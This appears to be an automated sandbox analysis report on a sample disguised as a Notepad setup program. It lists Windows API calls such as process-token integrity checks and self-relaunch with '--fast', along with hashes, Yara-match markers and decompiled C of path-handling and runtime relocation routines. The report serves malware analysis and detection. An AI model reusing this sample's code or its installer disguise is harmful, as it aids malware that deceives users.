                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,006EF6BF,00000000,?,00000000,006EF612,00000000,00000000,?,00000000,006E2DE3), ref: 006F03F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleUnregisterWait$??3@ErrorLastclosesocketshutdown
                                      • String ID: s6nd
                                      • API String ID: 341968980-3381242404
                                      • Opcode ID: 02b17f4d7bed79e38c55a2e9b6723dcb73dabb44929e22bd00f878ada77140a7
                                      • Instruction ID: 96f194a45c0bce48370c0e955b71ad0c2762796d0714053bac5f2d6a8d6cc09c
                                      • Opcode Fuzzy Hash: 02b17f4d7bed79e38c55a2e9b6723dcb73dabb44929e22bd00f878ada77140a7
                                      • Instruction Fuzzy Hash: B8515D71604B06CFEB24CF69C888AA6B7F6FF14315B10491DEA96877A2C730E845CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 006E422C
                                        • Part of subcall function 006E42C5: OpenProcessToken.ADVAPI32(?,00000008,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42D7
                                        • Part of subcall function 006E42C5: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42F2
                                        • Part of subcall function 006E42C5: GetLastError.KERNEL32(?,?,00000000,?,?,006E4238,00000000), ref: 006E42F8
                                        • Part of subcall function 006E42C5: malloc.MSVCRT ref: 006E4306
                                        • Part of subcall function 006E42C5: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E4320
                                        • Part of subcall function 006E42C5: GetSidSubAuthorityCount.ADVAPI32(00000000,?,00000000,?,?,006E4238,00000000), ref: 006E4328
                                        • Part of subcall function 006E42C5: GetSidSubAuthority.ADVAPI32(00000000,?,?,00000000,?,?,006E4238,00000000), ref: 006E4338
                                        • Part of subcall function 006E42C5: ??3@YAXPAX@Z.MSVCRT ref: 006E4341
                                      • GetCommandLineW.KERNEL32 ref: 006E4240
                                      • lstrlenW.KERNEL32(00000000), ref: 006E4252
                                      • calloc.MSVCRT ref: 006E425E
                                      • lstrcpyW.KERNEL32(00000000,00000000), ref: 006E4272
                                      • lstrcatW.KERNEL32(00000000, --fast), ref: 006E427E
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E4291
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E42B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$??3@AuthorityInformationProcess$CommandCountCurrentErrorFileLastLineModuleNameOpencalloclstrcatlstrcpylstrlenmalloc
                                      • String ID: --fast
                                      • API String ID: 2839323878-3566243175
                                      • Opcode ID: 38e00596ac374b9a4b8cc4fa66765b7130f2c752cb1a6bc187e1ffd4f87bec19
                                      • Instruction ID: f97b41bd59ec5a7cf65b6c1b21f013e9b35fc693825a8b33b62a154dd2f4bf0d
                                      • Opcode Fuzzy Hash: 38e00596ac374b9a4b8cc4fa66765b7130f2c752cb1a6bc187e1ffd4f87bec19
                                      • Instruction Fuzzy Hash: 0A11E5721023666FE7206BB2AC9DEFF37AFAF00355F110525FB01D1181DE25CA41D965
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$memset
                                      • String ID:
                                      • API String ID: 4054172246-0
                                      • Opcode ID: 67823b63ac2aeac64fa0c6a7a3c734b55739890bfed90c04e06438a8b818e521
                                      • Instruction ID: ca933821de4d39687f5602635cc9f39e7864c95548561f5784dcb8d60076d2fe
                                      • Opcode Fuzzy Hash: 67823b63ac2aeac64fa0c6a7a3c734b55739890bfed90c04e06438a8b818e521
                                      • Instruction Fuzzy Hash: A4519C7240060AAFD721DF65C855BEBBBFAFF08314F108529E686D6281D774EA05CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 24%
                                      			E00408E44(signed int __eax, signed char** __ebx, void* __ecx, intOrPtr __edi, signed char* __esi) {
                                      				signed int _t133;
                                      				signed int _t136;
                                      				int _t138;
                                      				signed int _t139;
                                      				signed char* _t140;
                                      				signed char* _t143;
                                      				signed char** _t146;
                                      				void* _t154;
                                      				int _t167;
                                      				signed int _t170;
                                      				void* _t177;
                                      				int _t178;
                                      				signed int _t179;
                                      				int _t180;
                                      				void* _t184;
                                      				void* _t185;
                                      				int _t188;
                                      				void* _t189;
                                      				signed int _t192;
                                      				void _t196;
                                      				signed int _t198;
                                      				signed int _t204;
                                      				signed char** _t207;
                                      				signed int _t210;
                                      				int _t212;
                                      				signed int _t213;
                                      				signed char** _t214;
                                      				void* _t215;
                                      				signed int _t220;
                                      				signed char* _t222;
                                      				void** _t223;
                                      				signed char* _t224;
                                      				signed char* _t225;
                                      				signed int _t227;
                                      				signed int _t228;
                                      				int _t231;
                                      				int _t233;
                                      				void** _t234;
                                      				int _t235;
                                      				intOrPtr _t239;
                                      				intOrPtr _t242;
                                      				signed int _t244;
                                      				signed char* _t245;
                                      				int _t248;
                                      				intOrPtr* _t249;
                                      				int* _t250;
                                      				void** _t253;
                                      				signed char* _t254;
                                      				signed char* _t255;
                                      				signed char* _t256;
                                      				void* _t259;
                                      				void _t261;
                                      				signed char* _t262;
                                      				int _t263;
                                      				void _t264;
                                      				intOrPtr _t265;
                                      				void* _t266;
                                      				intOrPtr* _t269;
                                      				signed char** _t270;
                                      				int* _t275;
                                      				int* _t276;
                                      				int* _t277;
                                      				intOrPtr* _t278;
                                      
                                      				_t256 = __esi;
                                      				_t242 = __edi;
                                      				_t215 = __ecx;
                                      				_t207 = __ebx;
                                      				_t133 = __eax;
                                      				while(1) {
                                      					L1:
                                      					_t215 = _t215 + 1;
                                      					_t225 = _t256;
                                      					 *(_t215 - 1) = _t133;
                                      					if(_t133 == 0) {
                                      						break;
                                      					} else {
                                      						goto L2;
                                      					}
                                      					while(1) {
                                      						L2:
                                      						_t133 =  *_t225 & 0x000000ff;
                                      						_t256 =  &(_t225[1]);
                                      						if(_t133 != 0x7f) {
                                      							goto L1;
                                      						}
                                      						_t133 = _t225[1] & 0x000000ff;
                                      						_t215 = _t215 + 1;
                                      						_t225 =  &(_t225[2]);
                                      						 *(_t215 - 1) = _t133;
                                      						if(_t133 != 0) {
                                      							continue;
                                      						}
                                      						goto L4;
                                      					}
                                      				}
                                      				L4:
                                      				 *_t269 = _t242;
                                      				L00408484();
                                      				 *(_t266 - 0x2c) = 1;
                                      				_t270 = _t207;
                                      				if(_t133 == 0) {
                                      					L14:
                                      					return  *(_t266 - 0x2c);
                                      				} else {
                                      					 *(_t266 - 0x2c) = E00408C90(_t133, _t266 - 0x28);
                                      					if( *(_t266 - 0x2c) != 0) {
                                      						goto L14;
                                      					} else {
                                      						_t136 =  *( *(_t266 - 0x3c) + 1) & 0x000000ff;
                                      						if(_t136 == 0x2f || _t136 == 0x5c) {
                                      							L15:
                                      							 *_t270 =  *(_t266 - 0x40);
                                      							_t138 = strlen(??);
                                      							_t244 =  *(_t266 - 0x3c);
                                      							_t227 =  *(_t266 - 0x3c);
                                      							_t210 = _t244 + _t138;
                                      							_t139 =  *_t210 & 0x000000ff;
                                      							if(_t244 >= _t210) {
                                      								L20:
                                      								if(_t139 == 0x2f || _t139 == 0x5c) {
                                      									goto L23;
                                      								} else {
                                      									 *(_t266 - 0x61) = 0x5c;
                                      								}
                                      							} else {
                                      								while(_t139 != 0x2f) {
                                      									if(_t139 == 0x5c) {
                                      										goto L20;
                                      									} else {
                                      										_t210 = _t210 - 1;
                                      										_t139 =  *_t210 & 0x000000ff;
                                      										if(_t227 != _t210) {
                                      											continue;
                                      										} else {
                                      											goto L20;
                                      										}
                                      									}
                                      									goto L26;
                                      								}
                                      								goto L26;
                                      								L23:
                                      								_t210 = _t210 + 1;
                                      								_t228 = _t139;
                                      								_t139 =  *_t210 & 0x000000ff;
                                      								if(_t139 == 0x2f || _t139 == 0x5c) {
                                      									goto L23;
                                      								} else {
                                      									 *(_t266 - 0x61) = _t228;
                                      								}
                                      							}
                                      							goto L26;
                                      						} else {
                                      							_t196 =  *(_t266 - 0x40);
                                      							if( *_t196 != 0x2e ||  *((char*)(_t196 + 1)) != 0) {
                                      								goto L15;
                                      							} else {
                                      								if(( *(_t266 - 0x30) & 0x00000010) != 0) {
                                      									_t254 =  *(_t266 - 0x3c);
                                      									_t198 = E00408BF0(_t254,  *(_t266 - 0x30));
                                      									 *(_t266 - 0x2c) = _t198;
                                      									if(_t198 == 0) {
                                      										 *_t270 = _t254;
                                      										_t214 = _t270;
                                      										_t278 = _t270 - E00408390(strlen(??) + 0x10 >> 4 << 4);
                                      										_t224 = _t254;
                                      										_t265 = _t278 + 0xc;
                                      										_t239 = _t265;
                                      										do {
                                      											_t204 =  *_t224 & 0x000000ff;
                                      											_t126 =  &(_t224[1]); // 0x1
                                      											_t255 = _t126;
                                      											if(_t204 != 0x7f) {
                                      												_t224 = _t255;
                                      											} else {
                                      												_t204 = _t224[1] & 0x000000ff;
                                      												_t224 =  &(_t224[2]);
                                      											}
                                      											_t239 = _t239 + 1;
                                      											 *(_t239 - 1) = _t204;
                                      										} while (_t204 != 0);
                                      										 *_t278 = _t265;
                                      										L00408484();
                                      										_t270 = _t214;
                                      										if(_t204 == 0 ||  *((intOrPtr*)(_t266 + 8)) == 0) {
                                      											goto L58;
                                      										} else {
                                      											E00408C90(_t204,  *((intOrPtr*)(_t266 + 8)));
                                      											_t245 =  *(_t266 - 0x20);
                                      										}
                                      									} else {
                                      										_t210 =  *(_t266 - 0x3c);
                                      										goto L12;
                                      									}
                                      								} else {
                                      									L12:
                                      									 *(_t266 - 0x61) = 0x5c;
                                      									 *(_t266 - 0x40) = 0;
                                      									L26:
                                      									_t245 =  *(_t266 - 0x20);
                                      									 *(_t266 - 0x2c) = 2;
                                      									_t140 =  *_t245;
                                      									if(_t140 != 0) {
                                      										 *(_t266 - 0x48) = _t210;
                                      										_t212 = _t245;
                                      										 *(_t266 - 0x3c) =  *(_t266 - 0x30) & 0x00008000;
                                      										do {
                                      											if( *(_t266 - 0x2c) == 1) {
                                      												L32:
                                      												 *(_t266 - 0x2c) = 1;
                                      											} else {
                                      												 *_t270 = _t140;
                                      												_t146 = E00409D60();
                                      												 *(_t266 - 0x34) = _t146;
                                      												if(_t146 == 0) {
                                      													if(( *(_t266 - 0x30) & 0x00000004) != 0) {
                                      														goto L32;
                                      													} else {
                                      														_t249 =  *((intOrPtr*)(_t266 - 0x38));
                                      														if(_t249 != 0) {
                                      															L0040A388();
                                      															_t270[1] =  *_t146;
                                      															 *_t270 =  *_t212;
                                      															if( *_t249() != 0) {
                                      																goto L32;
                                      															}
                                      														}
                                      													}
                                      												} else {
                                      													 *(_t266 - 0x4c) = 0;
                                      													if( *(_t266 - 0x40) != 0) {
                                      														 *_t270 =  *_t212;
                                      														 *(_t266 - 0x4c) = strlen(??);
                                      													}
                                      													 *(_t266 - 0x50) = 0;
                                      													 *((intOrPtr*)(_t266 - 0x60)) =  *(_t266 - 0x4c) + 2;
                                      													while(1) {
                                      														L39:
                                      														 *_t270 =  *(_t266 - 0x34);
                                      														_t154 = E00409F60();
                                      														_t259 = _t154;
                                      														if(_t154 == 0) {
                                      															break;
                                      														}
                                      														if( *(_t266 - 0x3c) == 0 ||  *((intOrPtr*)(_t259 + 8)) == 0x10) {
                                      															_t51 = _t259 + 0xc; // 0xc
                                      															_t248 = _t51;
                                      															if(E004089C0( *(_t266 - 0x48),  *(_t266 - 0x30), _t248) != 0) {
                                      																continue;
                                      															} else {
                                      																_t220 =  *(_t259 + 6) & 0x0000ffff;
                                      																 *(_t266 - 0x54) = _t270;
                                      																_t275 = _t270 - E00408390(_t220 +  *((intOrPtr*)(_t266 - 0x60)) + 0xf >> 4 << 4);
                                      																_t231 =  &(_t275[3]);
                                      																 *(_t266 - 0x58) = _t231;
                                      																_t167 = _t231;
                                      																if( *(_t266 - 0x4c) != 0) {
                                      																	_t261 =  *(_t266 - 0x4c);
                                      																	 *(_t266 - 0x68) = _t220;
                                      																	 *_t275 = _t231;
                                      																	_t275[2] = _t261;
                                      																	_t275[1] =  *_t212;
                                      																	 *(_t266 - 0x5c) = _t231;
                                      																	memcpy(??, ??, ??);
                                      																	_t170 =  *(_t275 + _t261 + 0xb) & 0x000000ff;
                                      																	_t231 =  *(_t266 - 0x5c);
                                      																	_t220 =  *(_t266 - 0x68);
                                      																	if(_t170 == 0x2f || _t170 == 0x5c) {
                                      																		_t167 =  *(_t266 - 0x4c) + _t231;
                                      																	} else {
                                      																		_t264 =  *(_t266 - 0x4c);
                                      																		 *((char*)(_t231 + _t264)) =  *(_t266 - 0x61) & 0x000000ff;
                                      																		_t167 = _t231 + _t264 + 1;
                                      																	}
                                      																}
                                      																 *(_t266 - 0x5c) = _t231;
                                      																_t275[2] = _t220 + 1;
                                      																_t275[1] = _t248;
                                      																_t250 = _t275;
                                      																 *_t275 = _t167;
                                      																memcpy(??, ??, ??);
                                      																 *_t275 =  *(_t266 - 0x5c);
                                      																_t177 = E00408390(strlen(??) + 0x10 >> 4 << 4);
                                      																_t262 =  *(_t266 - 0x58);
                                      																_t276 = _t275 - _t177;
                                      																_t178 =  &(_t276[3]);
                                      																 *(_t266 - 0x5c) = _t178;
                                      																_t233 = _t178;
                                      																while(1) {
                                      																	L46:
                                      																	_t179 =  *_t262 & 0x000000ff;
                                      																	_t222 =  &(_t262[1]);
                                      																	if(_t179 == 0x7f) {
                                      																		break;
                                      																	}
                                      																	_t233 = _t233 + 1;
                                      																	_t262 = _t222;
                                      																	 *(_t233 - 1) = _t179;
                                      																	if(_t179 != 0) {
                                      																		continue;
                                      																	}
                                      																	L48:
                                      																	_t180 =  *(_t266 - 0x5c);
                                      																	 *_t276 = _t180;
                                      																	L00408484();
                                      																	_t277 = _t250;
                                      																	_t263 = _t180;
                                      																	if(_t180 == 0) {
                                      																		 *(_t266 - 0x2c) = 3;
                                      																	} else {
                                      																		 *(_t266 - 0x2c) =  *(_t266 - 0x2c) & (0 |  *(_t266 - 0x2c) == 0x00000002) - 0x00000001;
                                      																		if(( *(_t266 - 0x30) & 0x00000040) == 0) {
                                      																			_t253 =  *(_t266 - 0x50);
                                      																			if(_t253 == 0) {
                                      																				 *_t277 = 0xc;
                                      																				_t184 = malloc(??);
                                      																				 *(_t266 - 0x50) = _t184;
                                      																				if(_t184 != 0) {
                                      																					_t185 =  *(_t266 - 0x50);
                                      																					 *(_t185 + 8) = _t263;
                                      																					 *(_t185 + 4) = 0;
                                      																					 *_t185 = 0;
                                      																				}
                                      																			} else {
                                      																				 *(_t266 - 0x58) = _t212;
                                      																				_t213 =  *(_t266 - 0x30) & 0x00004000;
                                      																				while(1) {
                                      																					_t188 = _t253[2];
                                      																					 *_t277 = _t263;
                                      																					_t277[1] = _t188;
                                      																					if(_t213 != 0) {
                                      																						_t188 = strcoll();
                                      																					} else {
                                      																						L0040A418();
                                      																					}
                                      																					_t223 =  *_t253;
                                      																					_t234 = _t253[1];
                                      																					if(_t188 <= 0) {
                                      																						_t234 = _t223;
                                      																					}
                                      																					if(_t234 == 0) {
                                      																						break;
                                      																					}
                                      																					_t253 = _t234;
                                      																				}
                                      																				_t212 =  *(_t266 - 0x58);
                                      																				 *(_t266 - 0x58) = _t188;
                                      																				 *_t277 = 0xc;
                                      																				_t189 = malloc(??);
                                      																				_t235 =  *(_t266 - 0x58);
                                      																				if(_t189 != 0) {
                                      																					 *(_t189 + 8) = _t263;
                                      																					 *(_t189 + 4) = 0;
                                      																					 *_t189 = 0;
                                      																					if(_t235 <= 0) {
                                      																						 *_t253 = _t189;
                                      																					} else {
                                      																						_t253[1] = _t189;
                                      																					}
                                      																				}
                                      																			}
                                      																		} else {
                                      																			if( *((intOrPtr*)(_t266 + 8)) != 0) {
                                      																				E00408C90(_t263,  *((intOrPtr*)(_t266 + 8)));
                                      																			}
                                      																		}
                                      																	}
                                      																	_t270 =  *(_t266 - 0x54);
                                      																	goto L39;
                                      																}
                                      																_t192 = _t262[1] & 0x000000ff;
                                      																_t233 = _t233 + 1;
                                      																_t262 =  &(_t262[2]);
                                      																 *(_t233 - 1) = _t192;
                                      																if(_t192 != 0) {
                                      																	goto L46;
                                      																}
                                      																goto L48;
                                      															}
                                      														} else {
                                      															continue;
                                      														}
                                      														goto L57;
                                      													}
                                      													 *_t270 =  *(_t266 - 0x34);
                                      													E00409FB0();
                                      													if( *(_t266 - 0x50) != 0) {
                                      														E00408CF0( *(_t266 - 0x50),  *((intOrPtr*)(_t266 + 8)));
                                      													}
                                      												}
                                      											}
                                      											goto L33;
                                      											L33:
                                      											_t143 =  *_t212;
                                      											_t212 = _t212 + 4;
                                      											 *_t270 = _t143;
                                      											E00408660();
                                      											_t140 =  *_t212;
                                      										} while (_t140 != 0);
                                      										L58:
                                      										_t245 =  *(_t266 - 0x20);
                                      									}
                                      								}
                                      							}
                                      						}
                                      						L57:
                                      						 *_t270 = _t245;
                                      						E00408660();
                                      						return  *(_t266 - 0x2c);
                                      					}
                                      				}
                                      			}

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _strdupmemcpystrlen
                                      • String ID: @$\
                                      • API String ID: 126217880-485402795
                                      • Opcode ID: 33e2115ce8d5890bea047f411af997a1ccd14a75029ed79c00dd22f9642798c4
                                      • Instruction ID: 5db1996a9a765f6b5e0bf04a52373715a988d65b50e301fadc0d474fe81a509c
                                      • Opcode Fuzzy Hash: 33e2115ce8d5890bea047f411af997a1ccd14a75029ed79c00dd22f9642798c4
                                      • Instruction Fuzzy Hash: 93514C71D047598BDB10DFA9C4442AEBBF1AF44304F08846ED895BB382DB39AC46CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 29%
                                      			E00408060(void* __ebx, void* __ecx, signed int __edx, long __edi, int __esi, void* __ebp, signed int _a4, char _a8) {
                                      				void* _v16;
                                      				struct _MEMORY_BASIC_INFORMATION* _v20;
                                      				signed int _v24;
                                      				signed int _v64;
                                      				intOrPtr _v72;
                                      				char* _v84;
                                      				int _v88;
                                      				intOrPtr _v92;
                                      				int _v96;
                                      				char** _v100;
                                      				intOrPtr _v120;
                                      				signed int _v144;
                                      				intOrPtr _t55;
                                      				int _t58;
                                      				long _t60;
                                      				signed int _t62;
                                      				intOrPtr _t64;
                                      				void* _t66;
                                      				void* _t67;
                                      				void* _t68;
                                      				intOrPtr _t69;
                                      				intOrPtr _t70;
                                      				signed int _t75;
                                      				void* _t76;
                                      				void* _t84;
                                      				int _t85;
                                      				intOrPtr* _t86;
                                      				void* _t91;
                                      				signed int* _t93;
                                      				intOrPtr _t96;
                                      				signed int _t98;
                                      				signed int _t103;
                                      				signed int _t104;
                                      				intOrPtr _t105;
                                      				intOrPtr _t106;
                                      				signed int _t108;
                                      				signed int _t109;
                                      				void* _t114;
                                      				void* _t120;
                                      				struct _MEMORY_BASIC_INFORMATION* _t124;
                                      				void* _t125;
                                      				signed int _t129;
                                      				int* _t134;
                                      				void* _t136;
                                      				void** _t137;
                                      				int* _t138;
                                      				char** _t139;
                                      				char** _t140;
                                      
                                      				_t132 = __ebp;
                                      				_t104 = __edx;
                                      				_t91 = __ecx;
                                      				_t137 = _t136 - 0x14;
                                      				_t55 = __imp___iob;
                                      				_v20 = 0x17;
                                      				_t124 =  &_a8;
                                      				_t3 = _t55 + 0x40; // 0x74894640
                                      				_t84 = _t3;
                                      				_v24 = 1;
                                      				_v16 = _t84;
                                      				 *_t137 = "Mingw runtime failure:\n";
                                      				fwrite(__ebx, __esi, ??, ??);
                                      				_v20 = _t124;
                                      				 *_t137 = _t84;
                                      				_v24 = _a4;
                                      				_t58 = vfprintf(??, ??, ??);
                                      				abort();
                                      				_push(__ebp);
                                      				_t116 = _t104;
                                      				_t125 = _t91;
                                      				_t85 = _t58;
                                      				_t138 = _t137 - 0x3c;
                                      				_v96 = 0x1c;
                                      				_v100 =  &_v84;
                                      				 *_t138 = _t85;
                                      				_t60 = VirtualQuery(_t84, _t124, __edi);
                                      				_t139 = _t138 - 0xc;
                                      				if(_t60 == 0) {
                                      					_v96 = _t85;
                                      					_v100 = 0x1c;
                                      					 *_t139 = "  VirtualQuery failed for %d bytes at address %p";
                                      					E00408060(_t85, _t91, _t104, _t116, _t125, __ebp);
                                      					_t62 =  *0x427044;
                                      					if(_t62 == 0) {
                                      						 *0x427044 = 1;
                                      						_t62 = 0;
                                      						if(0x425930 <= 7) {
                                      							goto L16;
                                      						} else {
                                      							_push(_t116);
                                      							_push(_t125);
                                      							_push(_t85);
                                      							_t140 = _t139 - 0x20;
                                      							_t105 =  *0x425930; // 0x0
                                      							if(0x425930 > 0xb) {
                                      								if(_t105 != 0) {
                                      									_t86 = 0x425930;
                                      									goto L42;
                                      								} else {
                                      									_t62 =  *0x425934; // 0x0
                                      									_t116 = _t62 |  *0x425938;
                                      									if((_t62 |  *0x425938) != 0) {
                                      										_t86 = 0x425930;
                                      										goto L22;
                                      									} else {
                                      										_t105 =  *0x42593c; // 0x0
                                      										_t86 = 0x42593c;
                                      										goto L20;
                                      									}
                                      								}
                                      							} else {
                                      								_t86 = 0x425930;
                                      								L20:
                                      								if(_t105 != 0) {
                                      									L42:
                                      									if(_t86 >= 0x425930) {
                                      										goto L29;
                                      									} else {
                                      										do {
                                      											_t48 = _t86 + 4; // 0x0
                                      											_t106 =  *_t48;
                                      											_t64 =  *_t86;
                                      											_t86 = _t86 + 8;
                                      											_t49 = _t106 + 0x400000; // 0x905a4d
                                      											_t50 = _t106 + 0x400000; // 0x400000
                                      											_v120 = _t64 +  *_t49;
                                      											_t66 = _t50;
                                      											L1();
                                      										} while (_t86 < 0x425930);
                                      										return _t66;
                                      									}
                                      								} else {
                                      									_t32 = _t86 + 4; // 0x0
                                      									_t62 =  *_t32;
                                      									L22:
                                      									if(_t62 != 0) {
                                      										goto L42;
                                      									} else {
                                      										_t33 = _t86 + 8; // 0x0
                                      										_t62 =  *_t33;
                                      										if(_t62 != 1) {
                                      											_v144 = _t62;
                                      											 *_t140 = "  Unknown pseudo relocation protocol version %d.\n";
                                      											_t67 = E00408060(_t86, _t91, _t105, _t116, _t125, _t132);
                                      											_push(_t91);
                                      											_push(_t67);
                                      											_t93 =  &_v144;
                                      											if(_t67 >= 0x1000) {
                                      												do {
                                      													_t93 = _t93 - 0x1000;
                                      													_t67 = _t67 - 0x1000;
                                      												} while (_t67 > 0x1000);
                                      											}
                                      											_pop(_t68);
                                      											return _t68;
                                      										} else {
                                      											while(1) {
                                      												L25:
                                      												_t86 = _t86 + 0xc;
                                      												if(_t86 >= 0x425930) {
                                      													break;
                                      												} else {
                                      													goto L26;
                                      												}
                                      												while(1) {
                                      													L26:
                                      													_t69 =  *_t86;
                                      													_t34 = _t86 + 4; // 0x0
                                      													_t96 =  *_t34;
                                      													_t35 = _t86 + 8; // 0x0
                                      													_t108 =  *_t35 & 0x000000ff;
                                      													_t36 = _t69 + 0x400000; // 0x400000
                                      													_t120 = _t36;
                                      													_t37 = _t96 + 0x400000; // 0x400000
                                      													_t129 = _t37;
                                      													_t38 = _t69 + 0x400000; // 0x905a4d
                                      													_t70 =  *_t38;
                                      													if(_t108 == 0x10) {
                                      														break;
                                      													}
                                      													if(_t108 != 0x20) {
                                      														if(_t108 == 8) {
                                      															_t98 =  *_t129 & 0x000000ff;
                                      															if(_t98 < 0) {
                                      																_t98 = _t98 | 0xffffff00;
                                      															}
                                      															_v120 = _t70 + _t98 - _t120;
                                      															_t62 = _t129;
                                      															L1();
                                      															goto L25;
                                      														} else {
                                      															_v144 = _t108;
                                      															 *_t140 = "  Unknown pseudo relocation bit size %d.\n";
                                      															_v120 = 0;
                                      															_t70 = E00408060(_t86, _t96, _t108, _t120, _t129, _t132);
                                      															break;
                                      														}
                                      														goto L51;
                                      													} else {
                                      														_t86 = _t86 + 0xc;
                                      														_v120 = _t70 - _t120 +  *_t129;
                                      														_t62 = _t129;
                                      														L1();
                                      														if(_t86 < 0x425930) {
                                      															continue;
                                      														}
                                      													}
                                      													goto L29;
                                      												}
                                      												_t43 = _t96 + 0x400000; // 0x905a4d
                                      												_t109 =  *_t43 & 0x0000ffff;
                                      												if(_t109 < 0) {
                                      													_t109 = _t109 | 0xffff0000;
                                      												}
                                      												_v120 = _t70 + _t109 - _t120;
                                      												_t62 = _t129;
                                      												L1();
                                      											}
                                      											L29:
                                      											return _t62;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					} else {
                                      						L16:
                                      						return _t62;
                                      					}
                                      				} else {
                                      					_t75 = _v64;
                                      					if(_t75 == 0x40 || _t75 == 4) {
                                      						if(_t125 != 0) {
                                      							_t76 = 0;
                                      							do {
                                      								 *((char*)(_t85 + _t76)) =  *(_t116 + _t76) & 0x000000ff;
                                      								_t76 = _t76 + 1;
                                      							} while (_t76 < _t125);
                                      						}
                                      						goto L7;
                                      					} else {
                                      						_t134 =  &_v88;
                                      						_v96 = 0x40;
                                      						_v92 = _t134;
                                      						_v100 = _v72;
                                      						 *_t139 = _v84;
                                      						_t75 = VirtualProtect(??, ??, ??, ??);
                                      						_t139 = _t139 - 0x10;
                                      						_t103 = _v64;
                                      						if(_t125 != 0) {
                                      							_t114 = 0;
                                      							do {
                                      								_t75 =  *(_t116 + _t114) & 0x000000ff;
                                      								 *(_t85 + _t114) = _t75;
                                      								_t114 = _t114 + 1;
                                      							} while (_t114 < _t125);
                                      						}
                                      						if(_t103 == 0x40 || _t103 == 4) {
                                      							L7:
                                      							return _t75;
                                      						} else {
                                      							_v92 = _t134;
                                      							_v96 = _v88;
                                      							_v100 = _v72;
                                      							 *_t139 = _v84;
                                      							return VirtualProtect(??, ??, ??, ??);
                                      						}
                                      					}
                                      				}
                                      				L51:
                                      			}

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Virtual$Protect$Queryabortfwritevfprintf
                                      • String ID: @
                                      • API String ID: 3498335539-2766056989
                                      • Opcode ID: c8c30f494b58f86f327aab961b4e78be351210a2951a2bb83a76c3f56018d1c5
                                      • Instruction ID: cbda29da314b6dc2f2444968f7cdba9b75ade7c0320947276bdd2fcea9e53b8f
                                      • Opcode Fuzzy Hash: c8c30f494b58f86f327aab961b4e78be351210a2951a2bb83a76c3f56018d1c5
                                      • Instruction Fuzzy Hash: 8C318CB19093559BD710EF29C68552FBBE0BF89708F04882EE8C8A7351DB39D944CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$mallocmemset
